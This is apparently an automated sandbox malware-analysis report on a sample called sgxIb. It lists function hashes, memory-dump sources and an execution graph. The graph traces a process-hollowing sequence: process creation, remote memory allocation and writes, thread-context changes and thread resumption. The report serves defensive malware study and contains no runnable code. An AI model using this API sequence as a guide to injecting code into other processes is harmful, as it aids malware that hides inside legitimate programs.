                                                                                                                    • Instruction ID: 8892c7ee9baeb490c3cdf139e75dccd4d6313a5b3fb3404a0b793067509255f6
                                                                                                                    • Opcode Fuzzy Hash: 6cb63d4efd15cccaac0b758df777629b0a2eb9ea66b926f762fffc119cceac7d
                                                                                                                    • Instruction Fuzzy Hash: 4301D131B201215BDB64956EA40972FE3DADBD9718F20983AE00EC7384DE75DC034385
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b59628c68a42b738c0847007dd012e7bb48aeec720a4ec34dcaf84eb685a0318
                                                                                                                    • Instruction ID: 6cb2eeaad1fb324e481129f5ad675c864bfb9869e455c4d172993cd8c622fe78
                                                                                                                    • Opcode Fuzzy Hash: b59628c68a42b738c0847007dd012e7bb48aeec720a4ec34dcaf84eb685a0318
                                                                                                                    • Instruction Fuzzy Hash: CB01DC31B002141BCB64EABEA454B2E63DADBC962CF208839E00ECB340DE25DC834386
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 791b618d8397cbd7ffcf398c13714f5a123af122f0f548d033f3cd80930da622
                                                                                                                    • Instruction ID: 935bf88a170a016ab379a6da82550e35841048844cfbbfaad5e512c29ee822f6
                                                                                                                    • Opcode Fuzzy Hash: 791b618d8397cbd7ffcf398c13714f5a123af122f0f548d033f3cd80930da622
                                                                                                                    • Instruction Fuzzy Hash: CC019EF8215B059BD3B48B2995A85F77BEAFB8A710F108D1DE44787641CB75EC018B40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 722158844347d97ef7c5d75f93b9b9574f3688528d9730d7a461d648f747b8c4
                                                                                                                    • Instruction ID: c8dfeaf8d32f8d7dca3f1f79e2780f718d0e5d0643f8dbdb0480072658aab923
                                                                                                                    • Opcode Fuzzy Hash: 722158844347d97ef7c5d75f93b9b9574f3688528d9730d7a461d648f747b8c4
                                                                                                                    • Instruction Fuzzy Hash: 8301D130B102211FCB65DA7EE44872A73DAEB8971CF109438E00ECB340DE25ED438785
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 56587144f57a324914ed9dce66a025be82ed39214a4b750451c264ff84a0bf10
                                                                                                                    • Instruction ID: 8f150102f8afb0a9749164bbef5e84e28804e1c7fa8204ca245a999b0d938728
                                                                                                                    • Opcode Fuzzy Hash: 56587144f57a324914ed9dce66a025be82ed39214a4b750451c264ff84a0bf10
                                                                                                                    • Instruction Fuzzy Hash: 97F0B471D04744EFCB318F7898004EAFFF9AF49200B0085ABE451C3601C734D948CBA1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 658ae373d41f690092b44af8bc0b6e0dc82bdce75b9bd472c65652299dbbebe1
                                                                                                                    • Instruction ID: 47ea90b0c8ee03e26d6bd344eee789af250abaa84e1b170be28ff3d06a3c0d75
                                                                                                                    • Opcode Fuzzy Hash: 658ae373d41f690092b44af8bc0b6e0dc82bdce75b9bd472c65652299dbbebe1
                                                                                                                    • Instruction Fuzzy Hash: 8FF01CB5E00718EF9B34CFA998004EAFBF9FF48610B00856AE45593600D731E9148B90
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 341db9ea94e567d2537e0e82231baf2f83e94d5d52908aa78bed71c3a2abf98f
                                                                                                                    • Instruction ID: 0b7fafee8e396eda742d50ef9f6c43c392d50294921ee8ac29cb65bc7d4899cc
                                                                                                                    • Opcode Fuzzy Hash: 341db9ea94e567d2537e0e82231baf2f83e94d5d52908aa78bed71c3a2abf98f
                                                                                                                    • Instruction Fuzzy Hash: 5DE0D871D143449FDFA0DB74CA0539D37A59B42208F2448E6C408DB20AF175CE428781
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e1fbe91d45b4951909707f0a863feff4f7aff157cf502dab239eb20b0e46dfe4
                                                                                                                    • Instruction ID: 4b020afda07c8419cc371cb6dbc6acb0b78fe648b548e3310b0f93bdef3a333d
                                                                                                                    • Opcode Fuzzy Hash: e1fbe91d45b4951909707f0a863feff4f7aff157cf502dab239eb20b0e46dfe4
                                                                                                                    • Instruction Fuzzy Hash: 18E0C270E10308ABDF60CEB8CA0575E73ACE70220CF2088A4D408CB206E272DA428780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a6011eac5f8262e55ae7ee41660ac2605df3d6984d2ea3a50bf2aa7e92adfe1a
                                                                                                                    • Instruction ID: ad8337858f6c66824150440df505a5b03fa5936e1e648aae118379634b876edd
                                                                                                                    • Opcode Fuzzy Hash: a6011eac5f8262e55ae7ee41660ac2605df3d6984d2ea3a50bf2aa7e92adfe1a
                                                                                                                    • Instruction Fuzzy Hash: D9E01A7A10028AEFCB169FA0C455CD5BFB2FF563107088898E4898F132C732E565EF00
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 49b2095fda8849f6ce01152f860d0892cc72e499b149f7ff81dae7e6eec7c794
                                                                                                                    • Instruction ID: 10db6875062fa039d0a3c11f23ac74dd736b395890437fbc517d8e4f337dd5c8
                                                                                                                    • Opcode Fuzzy Hash: 49b2095fda8849f6ce01152f860d0892cc72e499b149f7ff81dae7e6eec7c794
                                                                                                                    • Instruction Fuzzy Hash: 1CD022B220C26823EA2430A8B4112FF7B8D8B81624F0000A3D00CC7A81CD8DCC824AFB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 32b9ab2126721052ee6253643a8cbc772dff4e5283271bf7f1967cceaf22e861
                                                                                                                    • Instruction ID: c1d79c91ad9b4aacee2ff3b826957a3de39a0ab6d645068de3da36eddaa98d64
                                                                                                                    • Opcode Fuzzy Hash: 32b9ab2126721052ee6253643a8cbc772dff4e5283271bf7f1967cceaf22e861
                                                                                                                    • Instruction Fuzzy Hash: 1BD0127261826527DB182158A4206FEBA4D4B85539F1104ABD11CC7A82CEC5D88202DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 78b26627eb488c793ea1150989df6284894b94822d7c9338dfa96a208c4d6a34
                                                                                                                    • Instruction ID: 534345aeb07a44e710455032c37cdd19ff5ed15808d7da61122998de617d6e8a
                                                                                                                    • Opcode Fuzzy Hash: 78b26627eb488c793ea1150989df6284894b94822d7c9338dfa96a208c4d6a34
                                                                                                                    • Instruction Fuzzy Hash: 3DD0123224010D9E4B90EE94E880CF277DDBB546007808422E508C6520E621E564E752
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 811d0cccb69703b34fdf43e6241a3ed2360a07e2268548f91e59635976045b0e
                                                                                                                    • Instruction ID: a797334d3f8c8c7285cad8f9665bfe1e05f09ea7c9f0b8c8aa79de464010d851
                                                                                                                    • Opcode Fuzzy Hash: 811d0cccb69703b34fdf43e6241a3ed2360a07e2268548f91e59635976045b0e
                                                                                                                    • Instruction Fuzzy Hash: 17B0922232423A13DA18319D6420AFFB28E8BC9A69F50006BA60D877818DD6DC4202EF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dc817c400a0fc1a2bac0e5406ba17bacbccbf04595aba6b1fe2103d2f2d3e332
                                                                                                                    • Instruction ID: fc036151b57069a341802a53eba3b2915e98a759a8016df909743f3204539cef
                                                                                                                    • Opcode Fuzzy Hash: dc817c400a0fc1a2bac0e5406ba17bacbccbf04595aba6b1fe2103d2f2d3e332
                                                                                                                    • Instruction Fuzzy Hash: 49B092A231423A13DA18719D6420AFFB28E8BC9A69F00006BE60D877819DD69C4246EF
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3026849187.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_75b0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 7e53e3266d8a0cbf7a95287360a0a2d42814b1f72b31e377b054498713e6c783
                                                                                                                    • Instruction ID: f146d6105b8cd97ada7a320e6b78dded1edf3810e519eb5bd05bcbea6e4afb55
                                                                                                                    • Opcode Fuzzy Hash: 7e53e3266d8a0cbf7a95287360a0a2d42814b1f72b31e377b054498713e6c783
                                                                                                                    • Instruction Fuzzy Hash: B4D092B084421ACFEF718F80C8187FFBB70BB04315F004419D006A61D4CBBA0949CF51
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2222239885
                                                                                                                    • Opcode ID: 6c8161f390f3da945141d8c82170e142019b88077192bb680b6695c95d2df5e1
                                                                                                                    • Instruction ID: 485409121b6cd2ae12d2d4e8fd4c6e466be800cab58e4aa395787d9f7973b2b2
                                                                                                                    • Opcode Fuzzy Hash: 6c8161f390f3da945141d8c82170e142019b88077192bb680b6695c95d2df5e1
                                                                                                                    • Instruction Fuzzy Hash: BE121C34E003198FDF68DF65C854AAEB7F6BF89304F209969D409AB254DB309D86CF81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-3823777903
                                                                                                                    • Opcode ID: 4c014e8f8edaaa3e11a5a88da4f114445c5975e5c7cc3afc0b43df43734e1dc0
                                                                                                                    • Instruction ID: a8641557671c080601e28970785532a2a5cd0749cbdb74d944653a79d1747894
                                                                                                                    • Opcode Fuzzy Hash: 4c014e8f8edaaa3e11a5a88da4f114445c5975e5c7cc3afc0b43df43734e1dc0
                                                                                                                    • Instruction Fuzzy Hash: 0B916C30A103099FEB68DF69D948BAE77B2FF84305F209539E4059B294DF349E42CB91
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-390881366
                                                                                                                    • Opcode ID: b3e02c73a67a5c228c69e13674b0131f9facd30070d4f242f476c7604739d033
                                                                                                                    • Instruction ID: 00ec9ab9aa78683d0e88ccbaf4c53b1483a9d05007d483460da8b7068ab45421
                                                                                                                    • Opcode Fuzzy Hash: b3e02c73a67a5c228c69e13674b0131f9facd30070d4f242f476c7604739d033
                                                                                                                    • Instruction Fuzzy Hash: B4F14C34B10209CFDB59EB68D494AAEBBB6FF88305F209568D4159B394DF35EC42CB81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2392861976
                                                                                                                    • Opcode ID: 415468b01a3663eec225c2fea93ce07bc996f09f243ba90f151abede37bc3ae4
                                                                                                                    • Instruction ID: 66485f43c61ad617a1243b1d68e77cc973a6b715ebd5059f64e9d666bb8891a6
                                                                                                                    • Opcode Fuzzy Hash: 415468b01a3663eec225c2fea93ce07bc996f09f243ba90f151abede37bc3ae4
                                                                                                                    • Instruction Fuzzy Hash: C6719FB0E103198FDB68CF68D4446AEB7F2FF85305B219929D40A9F254EB71DC46CB81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: 856c9b2554edacbdfbfc722c9e9b0f1578785a56f198f08c868c8a85db578d06
                                                                                                                    • Instruction ID: 5604677eb923f98274826b37787305e1784078549ad27cfc1eb062f84bc041cc
                                                                                                                    • Opcode Fuzzy Hash: 856c9b2554edacbdfbfc722c9e9b0f1578785a56f198f08c868c8a85db578d06
                                                                                                                    • Instruction Fuzzy Hash: 25B14B34E103198FDB54EB69D5846AEB7B2FF88305F249929D40ADB394DB35DC82CB81
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: LR^q$LR^q$$^q$$^q
                                                                                                                    • API String ID: 0-2454687669
                                                                                                                    • Opcode ID: 2282a2449c44551ac29ce0d5343ace1f8d198608c6c70f991bc227c8826fc8d1
                                                                                                                    • Instruction ID: 697020a60606cba1b6943182d38a823572e00d9d58b4b8bc804018f773492b76
                                                                                                                    • Opcode Fuzzy Hash: 2282a2449c44551ac29ce0d5343ace1f8d198608c6c70f991bc227c8826fc8d1
                                                                                                                    • Instruction Fuzzy Hash: 4F51B274B003059FDB58DB28D844A6EB7E6FF88704F149968E40A9F395DB34EC42CB92
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000013.00000002.3023648786.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_19_2_6ed0000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: $^q$$^q$$^q$$^q
                                                                                                                    • API String ID: 0-2125118731
                                                                                                                    • Opcode ID: c916f7d80bdbee9fd0acba1f25ebc45417c5f281151885d575d2381608491a27
                                                                                                                    • Instruction ID: c2251d79ba28b41ee824fd4c533b188c1a1b3d4a656a1947960ab3d3a5218f15
                                                                                                                    • Opcode Fuzzy Hash: c916f7d80bdbee9fd0acba1f25ebc45417c5f281151885d575d2381608491a27
                                                                                                                    • Instruction Fuzzy Hash: D351AE74E103048FDB65DB68E5806ADB3B2FB88315F24597AD815DB344DB31EE82CB91

                                                                                                                    Execution Graph

                                                                                                                    Execution Coverage:11.1%
                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                    Signature Coverage:0%
                                                                                                                    Total number of Nodes:151
                                                                                                                    Total number of Limit Nodes:8
                                                                                                                    execution_graph 37350 2a2ac70 37354 2a2ad68 37350->37354 37359 2a2ad59 37350->37359 37351 2a2ac7f 37355 2a2ad9c 37354->37355 37356 2a2ad79 37354->37356 37355->37351 37356->37355 37357 2a2afa0 GetModuleHandleW 37356->37357 37358 2a2afcd 37357->37358 37358->37351 37360 2a2ad9c 37359->37360 37361 2a2ad79 37359->37361 37360->37351 37361->37360 37362 2a2afa0 GetModuleHandleW 37361->37362 37363 2a2afcd 37362->37363 37363->37351 37432 2a2d000 37433 2a2d046 37432->37433 37437 2a2d5e8 37433->37437 37440 2a2d5d8 37433->37440 37434 2a2d133 37443 2a2d23c 37437->37443 37441 2a2d616 37440->37441 37442 2a2d23c DuplicateHandle 37440->37442 37441->37434 37442->37441 37444 2a2d650 DuplicateHandle 37443->37444 37445 2a2d616 37444->37445 37445->37434 37241 515ff50 37242 515ff6a 37241->37242 37252 515ff8e 37242->37252 37254 91304a3 37242->37254 37257 9130a98 37242->37257 37261 9130819 37242->37261 37266 91306bb 37242->37266 37270 91305d4 37242->37270 37274 9130952 37242->37274 37278 9130929 37242->37278 37282 9130d0b 37242->37282 37285 9130c85 37242->37285 37289 91308a7 37242->37289 37294 754ef08 37254->37294 37258 9130abe 37257->37258 37298 754ed70 37258->37298 37302 9131128 37261->37302 37306 9131118 37261->37306 37310 91310d8 37261->37310 37262 9130831 37262->37252 37267 91309a6 37266->37267 37269 754eae8 Wow64SetThreadContext 37267->37269 37268 91309c1 37268->37252 37269->37268 37271 91305da 37270->37271 37318 754ea38 37271->37318 37275 913095b 37274->37275 37322 754ec80 37275->37322 37279 913094c 37278->37279 37281 754ec80 WriteProcessMemory 37279->37281 37280 9130bf3 37281->37280 37326 754ebc0 37282->37326 37286 9130c8b 37285->37286 37288 754ec80 WriteProcessMemory 37286->37288 37287 9130db9 37288->37287 37290 91305eb 37289->37290 37291 91308e8 37290->37291 37293 754ea38 ResumeThread 37290->37293 37291->37252 37292 9130600 37293->37292 37295 754ef91 CreateProcessA 37294->37295 37297 754f153 37295->37297 37299 754edbb ReadProcessMemory 37298->37299 37301 754edff 37299->37301 37303 913113d 37302->37303 37314 754eae8 37303->37314 37307 9131128 37306->37307 37309 754eae8 Wow64SetThreadContext 37307->37309 37308 9131153 37308->37262 37309->37308 37311 91310dd 37310->37311 37312 91310e3 37311->37312 37313 754eae8 Wow64SetThreadContext 37311->37313 37312->37262 37313->37312 37315 754eb2d Wow64SetThreadContext 37314->37315 37317 754eb75 37315->37317 37317->37262 37319 754ea78 ResumeThread 37318->37319 37321 754eaa9 37319->37321 37323 754ecc8 WriteProcessMemory 37322->37323 37325 754ed1f 37323->37325 37325->37252 37327 754ec00 VirtualAllocEx 37326->37327 37329 754ec3d 37327->37329 37364 5154040 37365 515405e 37364->37365 37366 51540da CallWindowProcW 37365->37366 37367 5154089 37365->37367 37366->37367 37368 7541c82 37373 7542827 37368->37373 37382 7542778 37368->37382 37385 7542770 37368->37385 37369 7541c96 37374 75427ac VirtualProtect 37373->37374 37378 754282b 37373->37378 37377 75427fa 37374->37377 37376 7542837 37376->37369 37377->37369 37378->37376 37389 7542b58 37378->37389 37394 7542b4b 37378->37394 37379 754291e 37379->37369 37383 75427c0 VirtualProtect 37382->37383 37384 75427fa 37383->37384 37384->37369 37386 7542778 VirtualProtect 37385->37386 37388 75427fa 37386->37388 37388->37369 37390 7542b7f 37389->37390 37391 7542bcc 37390->37391 37399 91311a3 37390->37399 37407 91311b0 37390->37407 37391->37379 37395 7542b58 37394->37395 37396 7542bcc 37395->37396 37397 91311a3 2 API calls 37395->37397 37398 91311b0 2 API calls 37395->37398 37396->37379 37397->37395 37398->37395 37400 91311aa 37399->37400 37403 9131223 37399->37403 37401 91311d0 37400->37401 37411 91311d8 37400->37411 37401->37390 37402 91313b3 37402->37390 37402->37402 37403->37402 37417 91314a8 PostMessageW 37403->37417 37419 91314a3 37403->37419 37408 91311c2 37407->37408 37409 91311d0 37408->37409 37410 91311d8 2 API calls 37408->37410 37409->37390 37410->37409 37412 91311e3 37411->37412 37414 9131246 37411->37414 37412->37401 37413 91313b3 37413->37401 37413->37413 37414->37413 37415 91314a3 PostMessageW 37414->37415 37416 91314a8 PostMessageW 37414->37416 37415->37414 37416->37414 37418 9131514 37417->37418 37418->37403 37420 91314a8 PostMessageW 37419->37420 37421 9131514 37420->37421 37421->37403 37457 754046c 37459 7542827 3 API calls 37457->37459 37460 7542770 VirtualProtect 37457->37460 37461 7542778 VirtualProtect 37457->37461 37458 754049d 37459->37458 37460->37458 37461->37458 37330 2a24668 37331 2a24672 37330->37331 37333 2a24759 37330->37333 37334 2a2477d 37333->37334 37338 2a24868 37334->37338 37342 2a24858 37334->37342 37340 2a2488f 37338->37340 37339 2a2496c 37340->37339 37346 2a244b0 37340->37346 37343 2a2488f 37342->37343 37344 2a2496c 37343->37344 37345 2a244b0 CreateActCtxA 37343->37345 37345->37344 37347 2a258f8 CreateActCtxA 37346->37347 37349 2a259bb 37347->37349 37451 7541179 37453 754117c 37451->37453 37452 75411e1 37453->37452 37454 7542827 3 API calls 37453->37454 37455 7542770 VirtualProtect 37453->37455 37456 7542778 VirtualProtect 37453->37456 37454->37453 37455->37453 37456->37453

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 706 7542827-7542829 707 75427ac-75427f8 VirtualProtect 706->707 708 754282b-7542835 706->708 714 7542801-7542822 707->714 715 75427fa-7542800 707->715 710 7542837-7542850 708->710 711 754289e-75428a5 708->711 712 7542857-754286c 710->712 713 7542852 710->713 716 75428a7 711->716 717 75428ac-7542915 711->717 713->712 715->714 716->717 744 7542918 call 7542b58 717->744 745 7542918 call 7542b4b 717->745 725 754291e-7542aca 744->725 745->725
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?), ref: 075427EB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.2003316002.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_7540000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID: FKy
                                                                                                                    • API String ID: 544645111-635708487
                                                                                                                    • Opcode ID: a97d22418b353958d698d55936732396cc64efec40a1e00e9a22d77673c9eadf
                                                                                                                    • Instruction ID: 150b24c503642e2aadf85c22543b05e628a4bcfac7cb33cb3761910244900919
                                                                                                                    • Opcode Fuzzy Hash: a97d22418b353958d698d55936732396cc64efec40a1e00e9a22d77673c9eadf
                                                                                                                    • Instruction Fuzzy Hash: E59129B5A01209DFCB04DFA8D588AEEBBF1FF48310F208569E845AB364DB359945CF61

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 864 754ef08-754ef9d 866 754efd6-754eff6 864->866 867 754ef9f-754efa9 864->867 872 754f02f-754f05e 866->872 873 754eff8-754f002 866->873 867->866 868 754efab-754efad 867->868 870 754efd0-754efd3 868->870 871 754efaf-754efb9 868->871 870->866 874 754efbd-754efcc 871->874 875 754efbb 871->875 883 754f097-754f151 CreateProcessA 872->883 884 754f060-754f06a 872->884 873->872 876 754f004-754f006 873->876 874->874 877 754efce 874->877 875->874 878 754f008-754f012 876->878 879 754f029-754f02c 876->879 877->870 881 754f014 878->881 882 754f016-754f025 878->882 879->872 881->882 882->882 885 754f027 882->885 895 754f153-754f159 883->895 896 754f15a-754f1e0 883->896 884->883 886 754f06c-754f06e 884->886 885->879 888 754f070-754f07a 886->888 889 754f091-754f094 886->889 890 754f07c 888->890 891 754f07e-754f08d 888->891 889->883 890->891 891->891 892 754f08f 891->892 892->889 895->896 906 754f1f0-754f1f4 896->906 907 754f1e2-754f1e6 896->907 908 754f204-754f208 906->908 909 754f1f6-754f1fa 906->909 907->906 910 754f1e8 907->910 912 754f218-754f21c 908->912 913 754f20a-754f20e 908->913 909->908 911 754f1fc 909->911 910->906 911->908 915 754f22e-754f235 912->915 916 754f21e-754f224 912->916 913->912 914 754f210 913->914 914->912 917 754f237-754f246 915->917 918 754f24c 915->918 916->915 917->918
                                                                                                                    APIs
                                                                                                                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0754F13E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.2003316002.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_7540000_sgxIb.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 963392458-0
                                                                                                                    • Opcode ID: dd9cd19f9dcde847c319064700195215eb5ad04304bdb4e6567a6e044452cf23
                                                                                                                    • Instruction ID: 6c7b4d07f6f6eac8b25458e1442ff82a7897d973cca538414106e79f07f447be
